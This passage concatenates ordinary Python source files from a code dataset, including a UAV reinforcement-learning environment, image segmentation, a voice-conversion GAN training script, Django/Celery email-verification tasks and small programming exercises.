cut.generate_imagen_meadn(lmdb_path,means_path+seq+\"_240_320\")\n","sub_path":"bin/generate_oversampling_2_4_5_lmdb.py","file_name":"generate_oversampling_2_4_5_lmdb.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"630602851","text":"import random\nimport numpy as np\nimport sys\nimport os\n\nSTATE_SPACE_SIZE = 27\nMOVES = [-1, 0, 1]\n\nclass Environment:\n\tA = [i for i in range(0, STATE_SPACE_SIZE)]\n\tA_DIFF = [(i, j, k) for i in MOVES for j in MOVES for k in MOVES]\n\n\tdef __init__(self, args, current_path):\n\t\tself.length = args['length']\n\t\tself.width = args['width']\n\t\tself.height = args['height']\n\t\tself.min_height = args['min_height']\n\t\tself.max_height = args['max_height']\n\t\tself.timeslot_num = args['timeslot_num']\n\t\tself.num_IotDevices = args['iot_devices_number']\n\t\tself.state_size = 3 + self.num_IotDevices * 2\n\t\tself.action_size = STATE_SPACE_SIZE\n\t\tself.uav_pos = []\n
\t\tself.iot_devices_pos = []\n\t\tself.uav_trajectory = []\n\t\tself.space_grid = []\n\t\tself.positions_idx = []\n\t\tself.a = []\n\t\tself.R = []\n\n\n\tdef set_positions_idx(self):\n\n\t\tspace_grid = [(i, j, k) for i in range(0, self.length) \n\t\t\t\t\t\t\t for j in range(0, self.width)\n\t\t\t\t\t\t\t for k in range(0, self.height)]\n\n\t\tspace_grid = np.array(space_grid)\n\n\t\tspace2D_state_size = self.length * self.width\n\t\tpositions_idx = np.random.choice(space2D_state_size, size=self.num_IotDevices+1, replace=False) * self.height\n\n\t\treturn [space_grid, positions_idx]\n\n\n\tdef reset(self):\n\n\t\t[self.space_grid, positions_idx] = self.set_positions_idx()\n\n\t\tself.uav_pos = self.space_grid[positions_idx[0], :]\n\t\tself.iot_devices_pos = self.space_grid[positions_idx[1:], :]\n\n\t\tself.uav_trajectory.append(self.uav_pos)\n\n\t\tself.a = np.zeros(self.num_IotDevices)\n\n\t\tself.R = np.zeros(self.num_IotDevices)\n\n\t\tinitial_state = np.concatenate((self.uav_pos, self.a, self.R), axis=0)\n\t\t\n\t\treturn initial_state, self.iot_devices_pos\n\n\n\tdef step(self, agent_action, cur_thrpts, min_thrpts, last_avg_min_thrpts, time_step):\n\n\t\treward = 0\n\n\t\t# update the position of agents\n\t\tuav_pos_temp = self.update_positions(self.uav_pos, agent_action)\n\n\t\tdims = np.array([self.length, self.width, self.height])\n\t\tfor i in range(0, 3):\n\t\t\t\t\tif uav_pos_temp[i] < 0:\n\t\t\t\t\t\tuav_pos_temp[i] = 0\n\t\t\t\t\t\treward -= 1\n\t\t\t\t\tif uav_pos_temp[i] >= dims[i] - 1:\n\t\t\t\t\t\tuav_pos_temp[i] = dims[i] - 1\n\t\t\t\t\t\treward -= 1 \n\n\t\tif uav_pos_temp[2] < self.min_height:\n\t\t\treward -= 1\n\t\tif uav_pos_temp[2] > self.max_height:\n\t\t\treward -= 1\n\n\t\tself.uav_trajectory.append(uav_pos_temp)\n\t\tself.uav_pos = uav_pos_temp\n\n\t\tuav_iot_dists = [np.linalg.norm(dev_pos - self.uav_pos, 1) for dev_pos in self.iot_devices_pos]\n\n\t\tdevice_t = np.argmin(uav_iot_dists)\n\t \n\t\tself.a[device_t] += 1\n\n\t\tdevice_t_thrpt = self.cal_thrpt(self.iot_devices_pos[device_t], self.uav_pos)\n\n\t\tself.R[device_t] += device_t_thrpt\n\n\t\tif cur_thrpts[device_t] == 0:\n\t\t\tmin_thrpts[device_t] = device_t_thrpt\n\t\telif cur_thrpts[device_t] <= device_t_thrpt:\n\t\t\tmin_thrpts[device_t] = device_t_thrpt\n\t\t\treward -= 1\n\n\t\tcur_thrpts[device_t] = device_t_thrpt\n\n\t\tnew_state = np.concatenate((self.uav_pos, self.a, self.R), axis=0)\n\t\t\n\t\tif time_step == self.timeslot_num-1:\n\t\t\tif np.min(min_thrpts) == 0.0:\n\t\t\t\treward -= 2\n\n\t\t\tif last_avg_min_thrpts > np.average(min_thrpts):\n\t\t\t\treward -= 1\n\n\t\t\treturn [new_state, reward, cur_thrpts, min_thrpts, self.uav_trajectory]\n\n\t\treturn [new_state, reward, cur_thrpts, min_thrpts, []]\n\n\n\tdef cal_thrpt(self, dev_pos, uav_pos):\n\t\td = np.linalg.norm(dev_pos - uav_pos, 1)\n\t\treturn np.log2(1+1/(d+0.001))\n\n\n\tdef update_positions(self, pos, act):\n\t\tmove = self.A_DIFF[act]\n\t\tfinal_positions = pos + np.array(move)  # apply the decoded (dx, dy, dz) move, not the raw action index\n\t\treturn final_positions\n\n\n","sub_path":"environment/uav_env.py","file_name":"uav_env.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"488615060","text":"# -*- coding: utf-8 -*-\n\n# Copyright (C) 2018 VTS, FUDAN UNIVERSITY\n# @author Li Wenxi\n# Efficient Graph-Based Image Segmentation[J].
International Journal of Computer Vision, 2004, 59(2):167-181.\n# Felzenszwalb P F, Huttenlocher D P.\n\nimport cv2\nimport sys\nimport numpy as np\n\n\ndef _diff(img, x1, y1, x2, y2):\n r = np.square(img[0][y1, x1] - img[0][y2, x2])\n g = np.square(img[1][y1, x1] - img[1][y2, x2])\n b = np.square(img[2][y1, x1] - img[2][y2, x2])\n return np.sqrt(r + b + g)\n\n\nclass universe():\n def __init__(self, elements):\n self.num = elements;\n self.elts = []\n for i in range(elements):\n rank = 0;\n size = 1;\n p = i;\n self.elts.append((rank, size, p))\n\n # a older func\n def find(self, x):\n y = x\n while (y != self.elts[y][2]):\n y = self.elts[y][2]\n self.elts[x] = (self.elts[x][0], self.elts[x][1], y);\n return y\n\n # a newer func use recursion\n # def find(self, u):\n # if self.elts[u][2] == u:\n # return u\n #\n # self.elts[u] = (self.elts[u][0], self.elts[u][1], self.find(self.elts[u][2]))\n # return self.elts[u][2]\n\n def join(self, x, y):\n if self.elts[x][0] > self.elts[y][0]:\n self.elts[y] = (self.elts[y][0], self.elts[y][1], self.elts[x][2]);\n self.elts[x] = (self.elts[x][0], self.elts[x][1] + self.elts[y][1], self.elts[x][2])\n else:\n self.elts[x] = (self.elts[x][0], self.elts[x][1], self.elts[y][2])\n self.elts[y] = (self.elts[y][0], self.elts[y][1] + self.elts[x][1], self.elts[y][2])\n if self.elts[x][0] == self.elts[y][0]:\n self.elts[y] = (self.elts[y][0] + 1, self.elts[y][1], self.elts[y][2])\n self.num -= 1\n\n def size(self, x):\n return self.elts[x][1]\n\n def num_sets(self):\n return self.num\n\n\ndef _THRESHOLD(size, c):\n return c / size\n\n\n# Segment a graph\n#\n# Returns a disjoint-set forest representing the segmentation.\n#\n# num_vertices: number of vertices in graph.\n# num_edges: number of edges in graph\n# edges: array of edges.\n# c: constant for treshold function.\ndef _segment_graph(num_vertices, num_edges, graph, c):\n # make a disjoint-set forest\n u = universe(num_vertices)\n\n # init thresholds\n threshold = np.zeros(num_vertices, dtype=float)\n for i in range(num_vertices):\n threshold[i] = _THRESHOLD(1, c)\n\n # for each edge, in non-decreasing weight order...\n for i in range(num_edges):\n a = u.find(graph[i][0])\n b = u.find(graph[i][1])\n if a != b:\n if ((graph[i][2] <= threshold[a]) and\n graph[i][2] <= threshold[b]):\n u.join(a, b)\n a = u.find(a)\n threshold[a] = graph[i][2] + _THRESHOLD(u.size(a), c)\n return u\n\n\ndef _random_rgb():\n r = np.random.rand() * 255\n g = np.random.rand() * 255\n b = np.random.rand() * 255\n return (r, g, b)\n\n\n# Segment an image\n#\n# Returns a color image representing the segmentation.\n#\n# im: image to segment.\n# sigma: to smooth the image.\n# c: constant for treshold function.\n# min_size: minimum component size (enforced by post-processing stage).\n# num_ccs: number of connected components in the segmentation.\n\ndef segment_image(im, sigma, c,\n min_size, num_ccs):\n\n height, width, channel = im.shape\n np_im = np.array(im, dtype=float)\n gaussian_img = cv2.GaussianBlur(np_im, (5, 5), sigma)\n b, g, r = cv2.split(gaussian_img)\n smooth_img = (r, g, b)\n\n # print(height, width, channel)\n\n # build graph\n graph = []\n num = 0;\n\n print(\"staring segment image\")\n for y in range(height):\n for x in range(width):\n if x < width - 1:\n a = y * width + x\n b = y * width + (x + 1)\n # w = 1\n w = _diff(smooth_img, x, y, x + 1, y)\n num += 1\n graph.append((a, b, w))\n\n if y < height - 1:\n a = y * width + x\n b = (y + 1) * width + x\n w = _diff(smooth_img, x, y, x, y + 1)\n num += 1\n graph.append((a, 
b, w))\n\n if x < width - 1 and y < height - 1:\n a = y * width + x\n b = (y + 1) * width + (x + 1)\n w = _diff(smooth_img, x, y, x + 1, y + 1)\n num += 1\n graph.append((a, b, w))\n\n if x < width - 1 and y > 0:\n a = y * width + x\n b = (y - 1) * width + (x + 1)\n w = _diff(smooth_img, x, y, x + 1, y - 1)\n num += 1\n graph.append((a, b, w))\n # print(x, y)\n\n # sort edges by weight\n # graph.sort(key=lambda x: (x[2]))\n graph = sorted(graph, key=lambda x: (x[2]))\n # segment\n\n u = _segment_graph(width * height, num, graph, c)\n\n # post process small components\n for i in range(num):\n a = u.find(graph[i][0])\n b = u.find(graph[i][1])\n if (a != b) and ((u.size(a) < min_size) or u.size(b) < min_size):\n u.join(a, b)\n\n num_ccs.append(u.num_sets())\n\n # colors = []\n # for i in range(width * height):\n # colors.append(random_rgb())\n #\n # print(\"staring random colors\")\n #\n # # print(\"width\", width, \"height\", height)\n #\n # for y in range(height):\n # for x in range(width):\n # comp = u.find(y * width + x)\n # gaussian_img[y][x] = colors[comp]\n # print(im)\n # im = np.array(im, dtype=int)\n # print(im.shape)\n # print(im)\n # cv2.imshow(\"before\", im[:, :, :3])\n # cv2.waitKey(0)\n im = np.append(im, np.zeros(im.shape[:2], dtype=np.uint8)[:, :, np.newaxis], axis=2)\n # print(im)\n # cv2.imshow(\"after\", im)\n # cv2.waitKey(0)\n dictionary = {}\n count = 0\n for y in range(height):\n for x in range(width):\n temp = u.find(y * width + x)\n if dictionary.__contains__(temp) == False:\n dictionary[temp] = count\n count += 1\n im[y, x, 3] = dictionary[temp]\n # np.set_printoptions(threshold='nan')\n # print(dictionary)\n # print(im[:, :, 3])\n # print(count)\n return im","sub_path":"Graph-Algorithm/SelectiveSearch(Python with OpenCV or scikit-image)/selective-search-based-on-my-segmentation/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"360026598","text":"# -*- coding: utf-8 -*-\nfrom datetime import date\n\nweek = [\n 'Monday',\n 'Tuesday',\n 'Wednesday',\n 'Thursday',\n 'Friday',\n 'Saturday',\n 'Sunday'\n]\n\nwhile True:\n m, d = list(map(int, input().split()))\n if m == 0:\n break\n\n d = date(2004, m, d)\n print(week[d.weekday()])\n","sub_path":"vol00/0027.py","file_name":"0027.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"157018555","text":"import os\nimport numpy as np\nimport argparse\nimport time\nimport librosa\n\nfrom preprocess import *\nfrom model import CCGAN\n\n\ndef train(speaker_name_list, num_epochs, train_dir, validation_dir, model_dir, model_name, random_seed, output_dir, tensorboard_log_dir):\n \n print(speaker_name_list)\n \n np.random.seed(random_seed)\n num_speakers = len(speaker_name_list)\n \n num_sentences = 162 # min(number of setences for each speaker)\n num_epochs = num_epochs\n no_decay = num_epochs * num_sentences * (num_speakers ** 2) / 2.0\n id_mappig_loss_zero = 10000 * (num_speakers ** 2) # can be less\n \n mini_batch_size = 1 # must be 1\n generator_learning_rate = 0.0002\n \n generator_learning_rate_decay = generator_learning_rate / no_decay\n discriminator_learning_rate = 0.0001\n discriminator_learning_rate_decay = discriminator_learning_rate / no_decay\n sampling_rate = 16000\n num_mcep = 24\n frame_period = 5.0\n n_frames = 128\n \n lambda_cycle = 10\n lambda_identity = 5\n lambda_A2B = 3 # 1 is bad, 
3~8 is good\n \n dic_sps_norm = {}\n dic_sps_mean = {}\n dic_sps_std = {}\n dic_f0s_mean = {}\n dic_f0s_std = {}\n\n print('Preprocessing Data...')\n\n start_time = time.time()\n \n for speaker in speaker_name_list:\n if not os.path.exists(os.path.join(model_dir, speaker + '.npz')):\n wavs = load_wavs(wav_dir = os.path.join(train_dir, speaker), sr = sampling_rate)\n f0s, timeaxes, sps, aps, coded_sps = world_encode_data(wavs = wavs, fs = sampling_rate, frame_period = frame_period, coded_dim = num_mcep)\n log_f0s_mean, log_f0s_std = logf0_statistics(f0s)\n coded_sps_transposed = transpose_in_list(lst = coded_sps)\n coded_sps_norm, coded_sps_mean, coded_sps_std = coded_sps_normalization_fit_transoform(coded_sps = coded_sps_transposed)\n np.savez(os.path.join(model_dir, speaker + '.npz'), coded_sps = coded_sps, f0s_mean = log_f0s_mean, f0s_std = log_f0s_std, sps_mean = coded_sps_mean, sps_std = coded_sps_std)\n dic_sps_mean[speaker] = coded_sps_mean\n dic_sps_std[speaker] = coded_sps_std\n dic_f0s_mean[speaker] = log_f0s_mean\n dic_f0s_std[speaker] = log_f0s_std\n else: \n npload = np.load(os.path.join(model_dir, speaker + '.npz'), allow_pickle = True)\n coded_sps = npload['coded_sps']\n dic_sps_mean[speaker] = npload['sps_mean']\n dic_sps_std[speaker] = npload['sps_std']\n dic_f0s_mean[speaker] = npload['f0s_mean']\n dic_f0s_std[speaker] = npload['f0s_std']\n coded_sps_transposed = transpose_in_list(lst = coded_sps)\n coded_sps_norm, _, _ = coded_sps_normalization_fit_transoform(coded_sps = coded_sps_transposed)\n \n dic_sps_norm[speaker] = coded_sps_norm \n \n print('Log Pitch', speaker)\n print('Mean: %f, Std: %f' %(dic_f0s_mean[speaker], dic_f0s_std[speaker]))\n \n coded_sps_norm_list = []\n for speaker in speaker_name_list:\n coded_sps_norm_list.append(dic_sps_norm[speaker])\n \n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n end_time = time.time()\n time_elapsed = end_time - start_time\n\n print('Preprocessing Done.')\n\n print('Time Elapsed for Data Preprocessing: %02d:%02d:%02d' % (time_elapsed // 3600, (time_elapsed % 3600 // 60), (time_elapsed % 60 // 1)))\n\n model = CCGAN(num_features = num_mcep, num_speakers = num_speakers)\n\n for epoch in range(num_epochs):\n print('Epoch: %d' % epoch) # 현재 에포크 출력\n\n start_time_epoch = time.time()\n n_samples, dataset_src, dataset_tar = sample_train_data_mix_all_mapping(coded_sps_norm_list, n_frames = 128)\n \n for sentence_idx in range(n_samples):\n for case_src in range(num_speakers):\n for case_tar in range(num_speakers):\n \n A_id = [0.]*num_speakers\n B_id = [0.]*num_speakers\n \n A_id[case_src] = 1.0\n B_id[case_tar] = 1.0\n \n mapping_direction = num_speakers * case_src + case_tar\n\n num_iterations = (num_speakers * num_speakers * n_samples * epoch) + (num_speakers * num_speakers * sentence_idx) + (num_speakers * case_src) + case_tar\n\n if num_iterations > id_mappig_loss_zero:\n lambda_identity = 0\n \n if num_iterations > no_decay: # iteration 이 넘어가면 선형감쇠 = 점점 조금 학습\n generator_learning_rate = max(0, generator_learning_rate - generator_learning_rate_decay)\n discriminator_learning_rate = max(0, discriminator_learning_rate - discriminator_learning_rate_decay)\n \n generator_loss, discriminator_loss = model.train(input_A = np.expand_dims(dataset_src[sentence_idx][mapping_direction], axis = 0), input_B = np.expand_dims(dataset_tar[sentence_idx][mapping_direction], axis = 0), lambda_cycle = lambda_cycle, lambda_identity = lambda_identity, lambda_A2B = lambda_A2B, generator_learning_rate = generator_learning_rate, 
discriminator_learning_rate = discriminator_learning_rate, A_id = A_id, B_id = B_id)\n\n if sentence_idx == 80 or sentence_idx == 161:\n print('Epoch: {:04d} Iteration: {:010d}, Generator Learning Rate: {:.8f}, Discriminator Learning Rate: {:.8f}'.format(epoch, num_iterations, generator_learning_rate, discriminator_learning_rate))\n print('src: {:s}, tar: {:s}, sent: {:d}, Generator Loss : {:.10f}, Discriminator Loss : {:.10f}'.format(speaker_name_list[case_src], speaker_name_list[case_tar], sentence_idx, generator_loss, discriminator_loss))\n\n if epoch % 50 == 0 and epoch != 0:\n model.save(directory = model_dir, filename = model_name) #모델저장\n\n end_time_epoch = time.time()\n time_elapsed_epoch = end_time_epoch - start_time_epoch\n\n print('Time Elapsed for This Epoch: %02d:%02d:%02d' % (time_elapsed_epoch // 3600, (time_elapsed_epoch % 3600 // 60), (time_elapsed_epoch % 60 // 1)))\n \n # validaiton is conducted for first speaker and last speaker of the speaker list\n # if you want full mapping validation, run convert_all.py\n \n if (epoch % 100 == 0 or epoch == num_epochs - 1) and epoch != 0:\n \n A_id_v = [0.]*num_speakers\n B_id_v = [0.]*num_speakers\n \n A_id_v[0] = 1.0\n B_id_v[-1] = 1.0\n \n src_v = speaker_name_list[0]\n tar_v = speaker_name_list[-1]\n \n log_f0s_mean_A = dic_f0s_mean[src_v]\n log_f0s_std_A = dic_f0s_std[src_v]\n coded_sps_A_mean = dic_sps_mean[src_v]\n coded_sps_A_std = dic_sps_std[src_v]\n \n log_f0s_mean_B = dic_f0s_mean[tar_v]\n log_f0s_std_B = dic_f0s_std[tar_v]\n coded_sps_B_mean = dic_sps_mean[tar_v]\n coded_sps_B_std = dic_sps_std[tar_v]\n \n if validation_dir is not None:\n validation_A_dir = os.path.join(validation_dir, src_v)\n \n if validation_A_dir is not None:\n validation_A_output_dir = os.path.join(output_dir, str(epoch)+'_'+src_v+'_to_'+tar_v)\n if not os.path.exists(validation_A_output_dir):\n os.makedirs(validation_A_output_dir)\n\n print('validaiton (SRC: %s, TAR: %s, epoch: %d)' %(src_v, tar_v, epoch))\n for file in os.listdir(validation_A_dir):\n filepath = os.path.join(validation_A_dir, file)\n wav, _ = librosa.load(filepath, sr = sampling_rate, mono = True)\n wav = wav_padding(wav = wav, sr = sampling_rate, frame_period = frame_period, multiple = 4)\n f0, timeaxis, sp, ap = world_decompose(wav = wav, fs = sampling_rate, frame_period = frame_period)\n f0_converted = pitch_conversion(f0 = f0, mean_log_src = log_f0s_mean_A, std_log_src = log_f0s_std_A, mean_log_target = log_f0s_mean_B, std_log_target = log_f0s_std_B)\n coded_sp = world_encode_spectral_envelop(sp = sp, fs = sampling_rate, dim = num_mcep)\n coded_sp_transposed = coded_sp.T\n coded_sp_norm = (coded_sp_transposed - coded_sps_A_mean) / coded_sps_A_std\n coded_sp_converted_norm = model.test(inputs = np.array([coded_sp_norm]),A_id = A_id_v, B_id = B_id_v)[0]\n coded_sp_converted = coded_sp_converted_norm * coded_sps_B_std + coded_sps_B_mean\n coded_sp_converted = coded_sp_converted.T\n coded_sp_converted = np.ascontiguousarray(coded_sp_converted)\n decoded_sp_converted = world_decode_spectral_envelop(coded_sp = coded_sp_converted, fs = sampling_rate)\n wav_transformed = world_speech_synthesis(f0 = f0_converted, decoded_sp = decoded_sp_converted, ap = ap, fs = sampling_rate, frame_period = frame_period)\n librosa.output.write_wav(os.path.join(validation_A_output_dir, os.path.basename(file)), wav_transformed, sampling_rate)\n \n A_id_v = [0.]*num_speakers\n B_id_v = [0.]*num_speakers\n \n A_id_v[-1] = 1.0\n B_id_v[0] = 1.0\n \n src_v = speaker_name_list[-1]\n tar_v = 
speaker_name_list[0]\n \n log_f0s_mean_A = dic_f0s_mean[src_v]\n log_f0s_std_A = dic_f0s_std[src_v]\n coded_sps_A_mean = dic_sps_mean[src_v]\n coded_sps_A_std = dic_sps_std[src_v]\n \n log_f0s_mean_B = dic_f0s_mean[tar_v]\n log_f0s_std_B = dic_f0s_std[tar_v]\n coded_sps_B_mean = dic_sps_mean[tar_v]\n coded_sps_B_std = dic_sps_std[tar_v]\n \n if validation_dir is not None:\n validation_A_dir = os.path.join(validation_dir, src_v)\n \n if validation_A_dir is not None:\n validation_A_output_dir = os.path.join(output_dir, str(epoch)+'_'+src_v+'_to_'+tar_v)\n if not os.path.exists(validation_A_output_dir):\n os.makedirs(validation_A_output_dir)\n\n print('validaiton (SRC: %s, TAR: %s, epoch: %d)' %(src_v, tar_v, epoch))\n for file in os.listdir(validation_A_dir):\n filepath = os.path.join(validation_A_dir, file)\n wav, _ = librosa.load(filepath, sr = sampling_rate, mono = True)\n wav = wav_padding(wav = wav, sr = sampling_rate, frame_period = frame_period, multiple = 4)\n f0, timeaxis, sp, ap = world_decompose(wav = wav, fs = sampling_rate, frame_period = frame_period)\n f0_converted = pitch_conversion(f0 = f0, mean_log_src = log_f0s_mean_A, std_log_src = log_f0s_std_A, mean_log_target = log_f0s_mean_B, std_log_target = log_f0s_std_B)\n coded_sp = world_encode_spectral_envelop(sp = sp, fs = sampling_rate, dim = num_mcep)\n coded_sp_transposed = coded_sp.T\n coded_sp_norm = (coded_sp_transposed - coded_sps_A_mean) / coded_sps_A_std\n coded_sp_converted_norm = model.test(inputs = np.array([coded_sp_norm]),A_id = A_id_v, B_id = B_id_v)[0]\n coded_sp_converted = coded_sp_converted_norm * coded_sps_B_std + coded_sps_B_mean\n coded_sp_converted = coded_sp_converted.T\n coded_sp_converted = np.ascontiguousarray(coded_sp_converted)\n decoded_sp_converted = world_decode_spectral_envelop(coded_sp = coded_sp_converted, fs = sampling_rate)\n wav_transformed = world_speech_synthesis(f0 = f0_converted, decoded_sp = decoded_sp_converted, ap = ap, fs = sampling_rate, frame_period = frame_period)\n librosa.output.write_wav(os.path.join(validation_A_output_dir, os.path.basename(file)), wav_transformed, sampling_rate)\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(description = 'Train CCGAN model for datasets.')\n \n speaker_name_list_default = ['SF1', 'SF2', 'SF3', 'SM1', 'SM2', 'TF1', 'TF2', 'TM1', 'TM2', 'TM3']\n num_epochs_default = 251\n train_dir_default = './data/vcc2016_training/'\n model_dir_default = './model'\n model_name_default = 'CCGAN.ckpt'\n random_seed_default = 0\n validation_dir_default = './data/evaluation_all/'\n output_dir_default = './validation_output'\n tensorboard_log_dir_default = './log'\n \n parser.add_argument('--speaker_name_list', type = str, nargs='+', help = 'Speaker Name List.', default = speaker_name_list_default)\n parser.add_argument('--num_epochs', type = int, help = 'Number of Epoch.', default = num_epochs_default)\n parser.add_argument('--train_dir', type = str, help = 'Directory for training.', default = train_dir_default)\n parser.add_argument('--validation_dir', type = str, help = 'If set none, no conversion would be done during the training.', default = validation_dir_default)\n parser.add_argument('--model_dir', type = str, help = 'Directory for saving models.', default = model_dir_default)\n parser.add_argument('--model_name', type = str, help = 'File name for saving model.', default = model_name_default)\n parser.add_argument('--random_seed', type = int, help = 'Random seed for model training.', default = random_seed_default)\n 
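# Illustrative usage note (not part of the original record): given the argparse defaults above,
# a typical invocation of this training script would look like
#   python train.py --speaker_name_list SF1 SF2 TM1 --num_epochs 101 --train_dir ./data/vcc2016_training/
# where each speaker name is assumed to match a subdirectory of train_dir; the flag values here are hypothetical.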
parser.add_argument('--output_dir', type = str, help = 'Output directory for converted validation voices.', default = output_dir_default)\n parser.add_argument('--tensorboard_log_dir', type = str, help = 'TensorBoard log directory.', default = tensorboard_log_dir_default)\n\n argv = parser.parse_args()\n\n speaker_name_list = argv.speaker_name_list\n num_epochs = argv.num_epochs\n train_dir = argv.train_dir\n model_dir = argv.model_dir\n model_name = argv.model_name\n random_seed = argv.random_seed\n validation_dir = None if argv.validation_dir == 'None' or argv.validation_dir == 'none' else argv.validation_dir\n output_dir = argv.output_dir\n tensorboard_log_dir = argv.tensorboard_log_dir\n \n train(speaker_name_list, num_epochs, train_dir, validation_dir, model_dir, model_name, random_seed, output_dir, tensorboard_log_dir) \n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244939093","text":"\n\nclass TreeNode():\n def __init__(self,ch,left,right):\n self.ch=ch\n self.left=left\n self.right=right\n\ndef main():\n m1,tr1= TreeBuild()\n m2,tr2= TreeBuild()\n\n if isOmorphic(tr1,m1,tr2,m2):\n print('Yes')\n else:\n print('No')\n\ndef TreeBuild():\n n = int(input())\n m=0\n check = []\n tNode = []\n for i in range(n):\n check.append(0)\n\n for i in range(n):\n line = input()\n ch,left,right=[k for k in line.split(' ')]\n tmp = TreeNode(ch,left,right)\n if left == '-':\n tmp.left=-1\n else:\n tmp.left=int(left)\n check[tmp.left] = 1\n if right =='-':\n tmp.right=-1\n else:\n tmp.right=int(right)\n check[tmp.right]=1\n tNode.append(tmp)\n\n for i in range(n):\n if check[i]==0:\n m=i\n break\n return m,tNode\n\ndef isOmorphic(tnode1,root1,tnode2,root2):\n if root1==-1 and root2 == -1:\n return 1\n if (root1==-1 and root2 != -1) or (root1 != -1 and root2 == -1):\n return 0\n if tnode1[root1].ch != tnode2[root2].ch:\n return 0\n\n t1 = isOmorphic(tnode1,tnode1[root1].left,tnode2,tnode2[root2].left) and isOmorphic(tnode1,tnode1[root1].right,tnode2,tnode2[root2].right)\n t2 = isOmorphic(tnode1,tnode1[root1].right,tnode2,tnode2[root2].left) and isOmorphic(tnode1,tnode1[root1].left,tnode2,tnode2[root2].right)\n return t1 or t2\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"03-树1 树的同构 (25分).py","file_name":"03-树1 树的同构 (25分).py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"28546682","text":"\"\"\"celery task\n\"\"\"\n# Django\nfrom django.conf import settings\nfrom django.template.loader import render_to_string\nfrom django.utils import timezone\nfrom django.core.mail import EmailMultiAlternatives\n\n#celery\nfrom celery.decorators import task, periodic_task\n\n#models\nfrom cride.users.models import User\nfrom cride.rides.models import Ride\n\n#utils\nimport jwt\nfrom datetime import timedelta\nimport time\n\ndef gen_verification_token(user):\n\t\"\"\" Create JWT token that the user can user to verify its account.\"\"\"\n\texp_date = timezone.now() + timedelta(days=3)\n\tpayload = {\n\t\t'user' : user.username,\n\t\t'exp' : int(exp_date.timestamp()),\n\t\t'type' : 'email_confirmation'\n\t}\n\ttoken = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')\n\t# token is a byte. 
Decode is not from jwt\n\treturn token.decode()\n\n@task(name='send_confirmation_email', max_retries=3)\ndef send_confirmation_email(user_pk):\n\t\"\"\" Send account verification link to given user \"\"\"\n\t\n\tfor i in range(30):\n\t\ttime.sleep(1)\n\t\tprint('Sleeping', str(i+1))\n\n\tuser = User.objects.get(pk=user_pk)\n\tverification_token = gen_verification_token(user)\n\n\tsubject = 'Welcome @{}! Verify yout account to start using Comparte Ride'.format(user.username)\n\tfrom_email = 'Comparte Ride '\n\tcontent = render_to_string(\n\t\t'emails/users/account_verification.html', \n\t\t{'token': verification_token, 'user': user}\n\t)\n\tmsg = EmailMultiAlternatives(subject, content, from_email, [user.email])\n\tmsg.attach_alternative(content, \"text/html\")\n\tmsg.send()\n\t\n\tprint(\"Sending email\")\n\n@periodic_task(name='disable_finished_rides', run_every=timedelta(minutes=20))\ndef disable_finished_rides():\n\t\"\"\"Disable finished rides.\"\"\"\n\tnow = timezone.now()\n\toffset = now + timedelta(minutes=20)\n\n\t# Update rides that have already finished\n\trides = Ride.objects.filter(\n\t\tarrival_date__gte=now,\n\t\tarrival_date__lte=offset,\n\t\tis_active=True\n\t)\n\trides.update(is_active=False)","sub_path":"cride/taskapp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"409835553","text":"import re\n\nstandard = [\"arabic\", \"roman\", \"Roman\", \"alph\", \"Alph\", \"hex\", \"binary\", \"oct\"]\t\t #the standard defined pagenumber styles in latex\n\n\n\"\"\"This function is used to search for a specific pagenumber style,\nin the file page_numbering.tex, if the style does not exist,\nit returns arabic\"\"\"\ndef search_styles(style):\n\tif style == \"\":\t\t #if not style is defined just return arabic\n\t\tstyle = \"arabic\"\n\telse:\n\t\tlist_styles = getStyles()\n\t\tif style not in list_styles:\t\t#check if the style is in the list\n\t\t\tstyle = \"arabic\"\t\t#if not return arabic\n\tif style == \"hex\":\n\t\tstyle = \"hexX\"\n\telif style == \"binary\":\n\t\tstyle = \"binaryX\"\n\telif style == \"oct\":\n\t\tstyle = \"octX\"\n\treturn style\t\t#otherwise return the style\n\ndef getStyles():\n\tf_style = open(\"Resources/page_numbering.tex\", 'r')\t\t #open the tex file for reading only\n\ttext = f_style.read()\n\tlist_styles = re.findall('\\@\\w*}',text)\t #use a regular expressions to get the strings where a specific combination of chars occur\n\tfor i in range(len(list_styles)):\t\t #go through the list of strings found\n\t\tlist_styles[i] = list_styles[i][1:len(list_styles[i])-1]\t\t#remove the first char from all entries in the list\n\t\t\n\treturn list_styles + standard\t\t #concat the list with the standard pagenumber style\n\t","sub_path":"auxiliary.py","file_name":"auxiliary.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"220249362","text":"import os\nimport errno\nfrom pathlib import Path\nfrom dataclasses import dataclass, field\n\nfrom .loaders import dispatch_loader\nfrom .savers import dispatch_saver\n\n\ndef create_safely(new_dir: Path):\n \"\"\"\n Create directory sagely\n Args:\n new_dir: path to dir\n\n Returns:\n None\n \"\"\"\n if os.path.isdir(new_dir):\n pass\n else:\n try:\n os.mkdir(new_dir)\n except FileExistsError as e:\n if e != errno.EEXIST:\n raise e\n\n\ndef _dump_(self, path: Path, postfix: str):\n name = 
